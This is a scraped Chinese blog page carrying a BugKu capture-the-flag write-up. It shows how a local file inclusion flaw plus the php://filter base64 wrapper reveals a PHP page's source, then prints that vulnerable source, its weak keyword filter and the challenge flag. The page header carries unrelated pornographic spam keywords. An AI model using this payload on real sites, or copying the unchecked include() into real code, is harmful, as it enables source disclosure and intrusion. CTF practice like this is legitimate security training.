日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

BugKuCTF WEB flag在index里

發布時間:2024/10/5 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 BugKuCTF WEB flag在index里 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

http://123.206.87.240:8005/post/

題解:本地文件包含漏洞+php偽協議的結合應用

原理:php的封裝協議:http://php.net/manual/zh/wrappers.php.php

點擊

URL

http://123.206.87.240:8005/post/index.php?file=show.php

文件包含漏洞

URL

http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

file=php://filter/read=convert.base64-encode/resource=index.php的含義

首先這是一個file關鍵字的get參數傳遞,php://是一種協議名稱,php://filter/是一種訪問本地文件的協議,/read=convert.base64-encode/表示讀取的方式是base64編碼后,resource=index.php表示目標文件為index.php。

通過傳遞這個參數可以得到index.php的源碼,下面說說為什么,看到源碼中的include函數,這個表示從外部引入php文件并執行,如果執行不成功,就返回文件的源碼。

而include的內容是由用戶控制的,所以通過我們傳遞的file參數,是include()函數引入了index.php的base64編碼格式,因為是base64編碼格式,所以執行不成功,返回源碼,所以我們得到了源碼的base64格式,解碼即可。

如果不進行base64編碼傳入,就會直接執行,而flag的信息在注釋中,是得不到的。

?

我們再看一下源碼中 存在對 ../ tp data input 的過濾,其實這都是php://協議中的其他方法,都可以結合文件包含漏洞執行。
?

base64解碼

<html><title>Bugku-ctf</title><?phperror_reporting(0);if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){echo "Oh no!";exit();}include($file); //flag:flag{edulcni_elif_lacol_si_siht} ?> </html>

?

總結

以上是生活随笔為你收集整理的BugKuCTF WEB flag在index里的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。